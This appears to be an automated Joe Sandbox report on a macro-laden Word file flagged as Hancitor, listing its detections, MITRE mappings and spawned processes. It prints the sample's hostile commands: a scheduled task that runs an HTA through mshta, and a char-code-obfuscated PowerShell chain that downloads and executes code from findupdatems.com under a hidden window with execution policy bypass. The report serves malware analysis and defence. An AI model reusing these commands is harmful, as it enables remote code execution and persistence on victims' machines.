Loading ...

Analysis Report 18#U042f.doc

Overview

General Information

Joe Sandbox Version:24.0.0 Fire Opal
Analysis ID:64199
Start date:17.11.2018
Start time:22:53:54
Joe Sandbox Product:Cloud
Overall analysis duration:0h 11m 59s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:18#U042f.doc
Cookbook file name:defaultwindowsofficecookbook.jbs
Analysis system description:W10 Native physical Machine for testing VM-aware malware (Office 2010, Java 1.8.0_91, Flash 22.0.0.192, Acrobat Reader DC 15.016.20039, Internet Explorer 11, Chrome 55, Firefox 50)
Number of analysed new started processes analysed:20
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • GSI enabled (VBA)
Analysis stop reason:Timeout
Detection:MAL
Classification:mal100.expl.evad.winDOC@25/12@1/0
EGA Information:Failed
HDC Information:Failed
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 0
  • Number of non-executed functions: 0
Cookbook Comments:
  • Adjust boot time
  • Found application associated with file extension: .doc
  • Found Word or Excel or PowerPoint or XPS Viewer
  • Simulate clicks
  • Number of clicks 343
  • Scroll down
  • Close Viewer
Warnings:
Show All
  • Exclude process from analysis (whitelisted): dllhost.exe, backgroundTaskHost.exe, WmiPrvSE.exe, OSPPSVC.EXE
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
  • Report size getting too big, too many NtOpenFile calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryAttributesFile calls found.
  • Report size getting too big, too many NtQueryDirectoryFile calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Report size getting too big, too many NtSetInformationFile calls found.
  • Skipping Hybrid Code Analysis (implementation is based on Java, .Net, VB or Delphi, or parses a document) for: powershell.exe

Detection

StrategyScoreRangeReportingDetection
Threshold1000 - 100Report FP / FNmalicious

Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification

Analysis Advice

All domains contacted by the sample do not resolve. Likely the sample is an old dropper which does no longer work
Sample might require command line arguments, analyze it with the command line cookbook
Sample monitors Window changes (e.g. starting applications), analyze the sample with the 'Simulates keyboard and window changes' cookbook



Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and Control
Valid AccountsCommand-Line Interface11Scheduled Task1Process Injection11Disabling Security Tools1Credential DumpingProcess Discovery1Application Deployment SoftwareData from Local SystemData CompressedStandard Non-Application Layer Protocol1
Replication Through Removable MediaScheduled Task1Port MonitorsScheduled Task1Process Injection11Network SniffingSecurity Software Discovery211Remote ServicesData from Removable MediaExfiltration Over Other Network MediumStandard Application Layer Protocol1
Drive-by CompromisePowerShell1Accessibility FeaturesPath InterceptionDeobfuscate/Decode Files or Information1Input CaptureRemote System Discovery1Windows Remote ManagementData from Network Shared DriveAutomated ExfiltrationCustom Cryptographic Protocol
Exploit Public-Facing ApplicationScripting32System FirmwareDLL Search Order HijackingScripting32Credentials in FilesSystem Information Discovery12Logon ScriptsInput CaptureData EncryptedMultiband Communication
Spearphishing LinkExploitation for Client Execution11Shortcut ModificationFile System Permissions WeaknessMasqueradingAccount ManipulationRemote System DiscoveryShared WebrootData StagedScheduled TransferStandard Cryptographic Protocol

Signature Overview

Click to jump to signature section


AV Detection:

barindex
Antivirus detection for submitted fileShow sources
Source: 18#U042f.docAvira: Label: W97M/Hancitor.hwhzo
Multi AV Scanner detection for submitted fileShow sources
Source: 18#U042f.docvirustotal: Detection: 61%Perma Link
Yara signature matchShow sources
Source: 00000007.00000002.2369970087.058E0000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 0000000C.00000002.2380851729.06F8A000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 0000000C.00000003.2186142865.005BA000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000007.00000002.2365632769.00600000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000007.00000002.2365595933.005DE000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 0000000C.00000002.2374595497.00910000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =

Software Vulnerabilities:

barindex
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\schtasks.exeJump to behavior
Potential document exploit detected (performs DNS queries)Show sources
Source: global trafficDNS query: name: findupdatems.com

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
Source: TrafficSnort IDS: 2026620 ET TROJAN Hades APT Domain in DNS Lookup (findupdatems .com) 192.168.0.60:59807 -> 8.8.8.8:53
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)Show sources
Source: unknownDNS traffic detected: query: findupdatems.com replaycode: Server failure (2)
Found strings which match to known social media urlsShow sources
Source: powershell.exe, 0000000C.00000002.2373521067.004F0000.00000004.sdmpString found in binary or memory: Microsoft.AspNet.Mvc.Facebook equals www.facebook.com (Facebook)
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: findupdatems.com
Urls found in memory or binary dataShow sources
Source: powershell.exe, 0000000C.00000003.2186142865.005BA000.00000004.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 0000000C.00000003.2186142865.005BA000.00000004.sdmpString found in binary or memory: http://crl.securetrust.com/STCA.crl0
Source: powershell.exe, 0000000C.00000002.2378186888.04F04000.00000004.sdmpString found in binary or memory: http://findupdatems.com
Source: powershell.exe, 0000000C.00000002.2378942518.05347000.00000004.sdmp, PowerShell_transcript.424505.Y2llNals.20181118102015.txt.12.drString found in binary or memory: http://findupdatems.com/ch
Source: powershell.exe, 0000000C.00000002.2378186888.04F04000.00000004.sdmpString found in binary or memory: http://findupdatems.com/check/index
Source: powershell.exe, 0000000C.00000002.2378186888.04F04000.00000004.sdmpString found in binary or memory: http://findupdatems.com/check/indexHlj)4jzIEX$
Source: powershell.exe, 0000000C.00000002.2378186888.04F04000.00000004.sdmpString found in binary or memory: http://findupdatems.com/check/indexd
Source: powershell.exe, 0000000C.00000002.2378186888.04F04000.00000004.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/
Source: powershell.exe, 0000000C.00000002.2378186888.04F04000.00000004.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/System.Management.Automation
Source: powershell.exe, 0000000C.00000002.2378186888.04F04000.00000004.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/System.Management.Automationl
Source: powershell.exe, 0000000C.00000002.2377895660.04D60000.00000004.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: 18#U042f.docString found in binary or memory: http://shopster.ua
Source: 18#U042f.docString found in binary or memory: http://shopster.ua/
Source: powershell.exe, 0000000C.00000002.2383934340.08D20000.00000004.sdmpString found in binary or memory: http://www.microsoft.c

System Summary:

barindex
Document contains an embedded VBA macro which may execute processesShow sources
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function NAPHLPR, API IWshShell3.Run("schtasks /Create /F /SC DAILY /ST "10:20" /TN "DriveCloudTaskCoreCheck" /TR "mshta C:\Users\user\AppData\Roaming\WPFT532.hta"",0:Integer,True)Name: NAPHLPR
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function NAPHLPR, API IWshShell3.Run("schtasks /Create /F /SC DAILY /ST "10:20" /TN "DriveCloudTaskCoreCheck" /TR "mshta C:\Users\user\AppData\Roaming\WPFT532.hta"",0:Integer,True)Name: NAPHLPR
Document contains an embedded VBA macro with suspicious stringsShow sources
Source: 18#U042f.docOLE, VBA macro line: KYC2525E = Environ(MSART8("FUUIFYF"))
Source: 18#U042f.docOLE, VBA macro line: Set kerberos = objFSO.CreateTextFile(KYC2525E & KBDUGHR1, True)
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function Frame1_Layout, String WsCRiPT.ShellName: Frame1_Layout
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function fixer_base, String schtasks /Create /F /SC DAILY /ST "10:20" /TN "DriveCloudTaskCoreCheck" /TR "mshta random_name"Name: fixer_base
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function fixer_base, String schtasks /Create /F /SC DAILY /ST "10:20" /TN "DriveCloudTaskCoreCheck" /TR "mshta random_name"Name: fixer_base
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, String PowERsheLl_iSEName: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function J0289430, String \WPFT532.htaName: J0289430
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function J0289430, String environ: KYC2525E = Environ(MSART8("FUUIFYF"))Name: J0289430
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function J0289430, String createtextfile: Set kerberos = objFSO.CreateTextFile(KYC2525E & KBDUGHR1, True)Name: J0289430
Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)Show sources
Source: 18#U042f.docStream path 'Macros/VBA/ThisDocument' : found possibly 'WScript.Shell' functions exec, run, environ
Document contains an ObjectPool stream indicating possible embedded files or OLE objectsShow sources
Source: 18#U042f.docOLE indicator, ObjectPool: true
Document contains an embedded VBA macro which executes code when the document is opened / closedShow sources
Source: 18#U042f.docOLE, VBA macro line: Sub Frame1_Layout()
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function Frame1_LayoutName: Frame1_Layout
Document contains embedded VBA macrosShow sources
Source: 18#U042f.docOLE indicator, VBA macros: true
Reads the hosts fileShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Searches for the Microsoft Outlook file pathShow sources
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Classification labelShow sources
Source: classification engineClassification label: mal100.expl.evad.winDOC@25/12@1/0
Creates files inside the user directoryShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.WordJump to behavior
Creates temporary filesShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR654D.tmpJump to behavior
Document contains an OLE Word Document stream indicating a Microsoft Word fileShow sources
Source: 18#U042f.docOLE indicator, Word Document stream: true
Document contains summary information with irregular field valuesShow sources
Source: 18#U042f.docOLE document summary: title field not present or empty
Parts of this applications are using the .NET runtime (Probably coded in C#)Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\35849a60913000fe067eb742f5cabec9\mscorlib.ni.dllJump to behavior
Queries process information (via WMI, Win32_Process)Show sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWMI Queries: IWbemServices::ExecQuery - root\ciMV2 : SELECT NamE FROM WIn32_PRoCEsS
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWMI Queries: IWbemServices::ExecQuery - root\ciMV2 : SELECT NamE FROM WIn32_PRoCEsS
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWMI Queries: IWbemServices::ExecQuery - root\ciMV2 : SELECT NamE FROM WIn32_PRoCEsS
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWMI Queries: IWbemServices::ExecQuery - root\ciMV2 : SELECT NamE FROM WIn32_PRoCEsS
Reads ini filesShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
Reads software policiesShow sources
Source: C:\Windows\splwow64.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Sample is known by AntivirusShow sources
Source: 18#U042f.docvirustotal: Detection: 61%
Spawns processesShow sources
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /n 'C:\Users\user\Desktop\18#U042f.doc
Source: unknownProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: unknownProcess created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /F /SC DAILY /ST '10:20' /TN 'DriveCloudTaskCoreCheck' /TR 'mshta C:\Users\user\AppData\Roaming\WPFT532.hta'
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0x4
Source: unknownProcess created: C:\Windows\System32\mshta.exe C:\Windows\system32\mshta.EXE C:\Users\user\AppData\Roaming\WPFT532.hta
Source: unknownProcess created: C:\Windows\System32\cmd.exe 'C:\WiNDOws\sYsTEM32\Cmd.eXE' /c 'Set AYW= -jOIn[CHAr[]] (40 ,39 , 40 , 78,39, 43,39 , 101, 119, 45, 79,39, 43 ,39 , 98,106 , 101 ,99 ,116 , 32 , 78,101 , 116 , 46 ,87, 39 , 43, 39 ,101 , 98 , 99 , 108, 105 ,101 ,110, 116 , 41,39 , 43 ,39,46,39,43 ,39 ,100 , 111,119 , 110 ,108 , 111 ,39,43 ,39, 97 , 100,115 ,116, 114,105 , 110 , 103,40 ,72 ,108, 39,43,39, 106,104,116 , 39 , 43 , 39 , 116 ,112, 58 , 39, 43,39 , 47, 47, 102 ,105, 110 , 100 , 117, 112 , 100, 97 ,39 , 43,39 , 116 ,101,39 ,43,39 , 109, 115 ,46,99 ,111, 109 , 47,99 , 104,39, 43,39, 101, 39 , 43 , 39,99 ,107 ,47,105 ,110,39 ,43 , 39 , 100 , 101 ,120,72,108, 106, 41,39 ,43 ,39, 52, 106 , 39,43,39 , 122,73 , 69,88, 39, 41 ,46 ,82 ,101, 112, 76 , 97,67,101, 40 ,40 ,91 , 99, 104,65 ,114 ,93,55, 50,43 ,91, 99, 104,65 , 114, 93,49,48,56, 43,91 ,99, 104,65 ,114,93,49, 48 ,54 , 41, 44,91,83,116 , 114, 73 ,110,103, 93 ,91 ,99 ,104,65, 114 ,93,51, 57 , 41, 46 ,82,101,112,76, 97, 67 ,101, 40 , 40,91,99, 104, 65, 114, 93, 53 ,50
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0x4
Source: unknownProcess created: C:\Windows\System32\cmd.exe c:\WiNDOws\sYsTEM32\Cmd.eXE /c %gNpq%
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c' ECHO inVOKe-ExPRessiON (get-ItEM eNV:AYw).valUe '
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWERsHElL -noPRoFI -EXEcuTiONpOlI BYPASS -noNi -NoeXi -WindoWStYlE HIdDen -
Source: unknownProcess created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /F /SC DAILY /ST '10:20' /TN 'DriveCloudTaskCoreCheck' /TR 'mshta C:\Users\user\AppData\Roaming\WPFT532.hta'
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0x4
Source: unknownProcess created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /F /SC DAILY /ST '10:20' /TN 'DriveCloudTaskCoreCheck' /TR 'mshta C:\Users\user\AppData\Roaming\WPFT532.hta'
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0x4
Source: unknownProcess created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /F /SC DAILY /ST '10:20' /TN 'DriveCloudTaskCoreCheck' /TR 'mshta C:\Users\user\AppData\Roaming\WPFT532.hta'
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0x4
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /F /SC DAILY /ST '10:20' /TN 'DriveCloudTaskCoreCheck' /TR 'mshta C:\Users\user\AppData\Roaming\WPFT532.hta'Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /F /SC DAILY /ST '10:20' /TN 'DriveCloudTaskCoreCheck' /TR 'mshta C:\Users\user\AppData\Roaming\WPFT532.hta'Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /F /SC DAILY /ST '10:20' /TN 'DriveCloudTaskCoreCheck' /TR 'mshta C:\Users\user\AppData\Roaming\WPFT532.hta'Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /F /SC DAILY /ST '10:20' /TN 'DriveCloudTaskCoreCheck' /TR 'mshta C:\Users\user\AppData\Roaming\WPFT532.hta'Jump to behavior
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe 'C:\WiNDOws\sYsTEM32\Cmd.eXE' /c 'Set AYW= -jOIn[CHAr[]] (40 ,39 , 40 , 78,39, 43,39 , 101, 119, 45, 79,39, 43 ,39 , 98,106 , 101 ,99 ,116 , 32 , 78,101 , 116 , 46 ,87, 39 , 43, 39 ,101 , 98 , 99 , 108, 105 ,101 ,110, 116 , 41,39 , 43 ,39,46,39,43 ,39 ,100 , 111,119 , 110 ,108 , 111 ,39,43 ,39, 97 , 100,115 ,116, 114,105 , 110 , 103,40 ,72 ,108, 39,43,39, 106,104,116 , 39 , 43 , 39 , 116 ,112, 58 , 39, 43,39 , 47, 47, 102 ,105, 110 , 100 , 117, 112 , 100, 97 ,39 , 43,39 , 116 ,101,39 ,43,39 , 109, 115 ,46,99 ,111, 109 , 47,99 , 104,39, 43,39, 101, 39 , 43 , 39,99 ,107 ,47,105 ,110,39 ,43 , 39 , 100 , 101 ,120,72,108, 106, 41,39 ,43 ,39, 52, 106 , 39,43,39 , 122,73 , 69,88, 39, 41 ,46 ,82 ,101, 112, 76 , 97,67,101, 40 ,40 ,91 , 99, 104,65 ,114 ,93,55, 50,43 ,91, 99, 104,65 , 114, 93,49,48,56, 43,91 ,99, 104,65 ,114,93,49, 48 ,54 , 41, 44,91,83,116 , 114, 73 ,110,103, 93 ,91 ,99 ,104,65, 114 ,93,51, 57 , 41, 46 ,82,101,112,76, 97, 67 ,101, 40 , 40,91,99, 104, 65, 114, 93, 53 ,50Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe c:\WiNDOws\sYsTEM32\Cmd.eXE /c %gNpq%Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c' ECHO inVOKe-ExPRessiON (get-ItEM eNV:AYw).valUe 'Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWERsHElL -noPRoFI -EXEcuTiONpOlI BYPASS -noNi -NoeXi -WindoWStYlE HIdDen -Jump to behavior
Uses an in-process (OLE) Automation serverShow sources
Source: C:\Windows\splwow64.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{88d96a06-f192-11d4-a65f-0040963251e5}\InProcServer32Jump to behavior
Reads internet explorer settingsShow sources
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
Found graphical window changes (likely an installer)Show sources
Source: Window RecorderWindow detected: More than 3 window changes detected
Uses Microsoft SilverlightShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
Checks if Microsoft Office is installedShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
Uses new MSVCR DllsShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.9177_none_5093cc7abcb795e9\MSVCR90.dllJump to behavior

Data Obfuscation:

barindex
Obfuscated command line foundShow sources
Source: unknownProcess created: C:\Windows\System32\cmd.exe 'C:\WiNDOws\sYsTEM32\Cmd.eXE' /c 'Set AYW= -jOIn[CHAr[]] (40 ,39 , 40 , 78,39, 43,39 , 101, 119, 45, 79,39, 43 ,39 , 98,106 , 101 ,99 ,116 , 32 , 78,101 , 116 , 46 ,87, 39 , 43, 39 ,101 , 98 , 99 , 108, 105 ,101 ,110, 116 , 41,39 , 43 ,39,46,39,43 ,39 ,100 , 111,119 , 110 ,108 , 111 ,39,43 ,39, 97 , 100,115 ,116, 114,105 , 110 , 103,40 ,72 ,108, 39,43,39, 106,104,116 , 39 , 43 , 39 , 116 ,112, 58 , 39, 43,39 , 47, 47, 102 ,105, 110 , 100 , 117, 112 , 100, 97 ,39 , 43,39 , 116 ,101,39 ,43,39 , 109, 115 ,46,99 ,111, 109 , 47,99 , 104,39, 43,39, 101, 39 , 43 , 39,99 ,107 ,47,105 ,110,39 ,43 , 39 , 100 , 101 ,120,72,108, 106, 41,39 ,43 ,39, 52, 106 , 39,43,39 , 122,73 , 69,88, 39, 41 ,46 ,82 ,101, 112, 76 , 97,67,101, 40 ,40 ,91 , 99, 104,65 ,114 ,93,55, 50,43 ,91, 99, 104,65 , 114, 93,49,48,56, 43,91 ,99, 104,65 ,114,93,49, 48 ,54 , 41, 44,91,83,116 , 114, 73 ,110,103, 93 ,91 ,99 ,104,65, 114 ,93,51, 57 , 41, 46 ,82,101,112,76, 97, 67 ,101, 40 , 40,91,99, 104, 65, 114, 93, 53 ,50
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe 'C:\WiNDOws\sYsTEM32\Cmd.eXE' /c 'Set AYW= -jOIn[CHAr[]] (40 ,39 , 40 , 78,39, 43,39 , 101, 119, 45, 79,39, 43 ,39 , 98,106 , 101 ,99 ,116 , 32 , 78,101 , 116 , 46 ,87, 39 , 43, 39 ,101 , 98 , 99 , 108, 105 ,101 ,110, 116 , 41,39 , 43 ,39,46,39,43 ,39 ,100 , 111,119 , 110 ,108 , 111 ,39,43 ,39, 97 , 100,115 ,116, 114,105 , 110 , 103,40 ,72 ,108, 39,43,39, 106,104,116 , 39 , 43 , 39 , 116 ,112, 58 , 39, 43,39 , 47, 47, 102 ,105, 110 , 100 , 117, 112 , 100, 97 ,39 , 43,39 , 116 ,101,39 ,43,39 , 109, 115 ,46,99 ,111, 109 , 47,99 , 104,39, 43,39, 101, 39 , 43 , 39,99 ,107 ,47,105 ,110,39 ,43 , 39 , 100 , 101 ,120,72,108, 106, 41,39 ,43 ,39, 52, 106 , 39,43,39 , 122,73 , 69,88, 39, 41 ,46 ,82 ,101, 112, 76 , 97,67,101, 40 ,40 ,91 , 99, 104,65 ,114 ,93,55, 50,43 ,91, 99, 104,65 , 114, 93,49,48,56, 43,91 ,99, 104,65 ,114,93,49, 48 ,54 , 41, 44,91,83,116 , 114, 73 ,110,103, 93 ,91 ,99 ,104,65, 114 ,93,51, 57 , 41, 46 ,82,101,112,76, 97, 67 ,101, 40 , 40,91,99, 104, 65, 114, 93, 53 ,50Jump to behavior
PowerShell case anomaly foundShow sources
Source: unknownProcess created: C:\Windows\System32\cmd.exe 'C:\WiNDOws\sYsTEM32\Cmd.eXE' /c 'Set AYW= -jOIn[CHAr[]] (40 ,39 , 40 , 78,39, 43,39 , 101, 119, 45, 79,39, 43 ,39 , 98,106 , 101 ,99 ,116 , 32 , 78,101 , 116 , 46 ,87, 39 , 43, 39 ,101 , 98 , 99 , 108, 105 ,101 ,110, 116 , 41,39 , 43 ,39,46,39,43 ,39 ,100 , 111,119 , 110 ,108 , 111 ,39,43 ,39, 97 , 100,115 ,116, 114,105 , 110 , 103,40 ,72 ,108, 39,43,39, 106,104,116 , 39 , 43 , 39 , 116 ,112, 58 , 39, 43,39 , 47, 47, 102 ,105, 110 , 100 , 117, 112 , 100, 97 ,39 , 43,39 , 116 ,101,39 ,43,39 , 109, 115 ,46,99 ,111, 109 , 47,99 , 104,39, 43,39, 101, 39 , 43 , 39,99 ,107 ,47,105 ,110,39 ,43 , 39 , 100 , 101 ,120,72,108, 106, 41,39 ,43 ,39, 52, 106 , 39,43,39 , 122,73 , 69,88, 39, 41 ,46 ,82 ,101, 112, 76 , 97,67,101, 40 ,40 ,91 , 99, 104,65 ,114 ,93,55, 50,43 ,91, 99, 104,65 , 114, 93,49,48,56, 43,91 ,99, 104,65 ,114,93,49, 48 ,54 , 41, 44,91,83,116 , 114, 73 ,110,103, 93 ,91 ,99 ,104,65, 114 ,93,51, 57 , 41, 46 ,82,101,112,76, 97, 67 ,101, 40 , 40,91,99, 104, 65, 114, 93, 53 ,50
Source: unknownProcess created: C:\Windows\System32\cmd.exe 'C:\WiNDOws\sYsTEM32\Cmd.eXE' /c 'Set AYW= -jOIn[CHAr[]] (40 ,39 , 40 , 78,39, 43,39 , 101, 119, 45, 79,39, 43 ,39 , 98,106 , 101 ,99 ,116 , 32 , 78,101 , 116 , 46 ,87, 39 , 43, 39 ,101 , 98 , 99 , 108, 105 ,101 ,110, 116 , 41,39 , 43 ,39,46,39,43 ,39 ,100 , 111,119 , 110 ,108 , 111 ,39,43 ,39, 97 , 100,115 ,116, 114,105 , 110 , 103,40 ,72 ,108, 39,43,39, 106,104,116 , 39 , 43 , 39 , 116 ,112, 58 , 39, 43,39 , 47, 47, 102 ,105, 110 , 100 , 117, 112 , 100, 97 ,39 , 43,39 , 116 ,101,39 ,43,39 , 109, 115 ,46,99 ,111, 109 , 47,99 , 104,39, 43,39, 101, 39 , 43 , 39,99 ,107 ,47,105 ,110,39 ,43 , 39 , 100 , 101 ,120,72,108, 106, 41,39 ,43 ,39, 52, 106 , 39,43,39 , 122,73 , 69,88, 39, 41 ,46 ,82 ,101, 112, 76 , 97,67,101, 40 ,40 ,91 , 99, 104,65 ,114 ,93,55, 50,43 ,91, 99, 104,65 , 114, 93,49,48,56, 43,91 ,99, 104,65 ,114,93,49, 48 ,54 , 41, 44,91,83,116 , 114, 73 ,110,103, 93 ,91 ,99 ,104,65, 114 ,93,51, 57 , 41, 46 ,82,101,112,76, 97, 67 ,101, 40 , 40,91,99, 104, 65, 114, 93, 53 ,50
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWERsHElL -noPRoFI -EXEcuTiONpOlI BYPASS -noNi -NoeXi -WindoWStYlE HIdDen -
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWERsHElL -noPRoFI -EXEcuTiONpOlI BYPASS -noNi -NoeXi -WindoWStYlE HIdDen -
